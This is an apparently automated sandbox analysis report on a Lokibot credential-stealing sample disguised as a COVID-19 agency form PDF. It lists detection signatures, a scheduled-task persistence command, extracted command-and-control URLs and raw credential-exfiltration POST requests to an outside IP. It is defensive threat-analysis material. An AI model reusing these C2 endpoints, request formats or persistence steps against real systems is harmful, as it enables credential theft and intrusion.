Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe

Overview

General Information

Sample Name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Analysis ID:442954
MD5:ea646520496fd4603aaf0f5778231f0d
SHA1:5112f3f6ae6a8a7cfac8364433128228c450f203
SHA256:a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
Tags:exelokibot
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe (PID: 5708 cmdline: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' MD5: EA646520496FD4603AAF0F5778231F0D)
    • schtasks.exe (PID: 5504 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x6ffe7:$des3: 68 03 66 00 00
        • 0x743e4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x744b0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x12fff:$des3: 68 03 66 00 00
                • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 15 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Double ExtensionShow sources
                Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine|base64offset|contains: HR, Image: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, NewProcessName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, OriginalFileName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' , ParentImage: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ProcessId: 3704

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://63.141.228.141/32.php/fn1ToJTMzu3TdVirustotal: Detection: 11%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeVirustotal: Detection: 34%Perma Link
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeReversingLabs: Detection: 19%
                Multi AV Scanner detection for submitted fileShow sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeVirustotal: Detection: 34%Perma Link
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeReversingLabs: Detection: 19%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeJoe Sandbox ML: detected
                Machine Learning detection for sampleShow sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeJoe Sandbox ML: detected
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 63.141.228.141:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://63.141.228.141/32.php/fn1ToJTMzu3Td
                Source: Joe Sandbox ViewIP Address: 63.141.228.141 63.141.228.141
                Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00404ED4 recv,6_2_00404ED4
                Source: unknownHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Jul 2021 12:36:31 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com8
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.combi
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comrsP
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.coms
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmpString found in binary or memory: https://apple.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
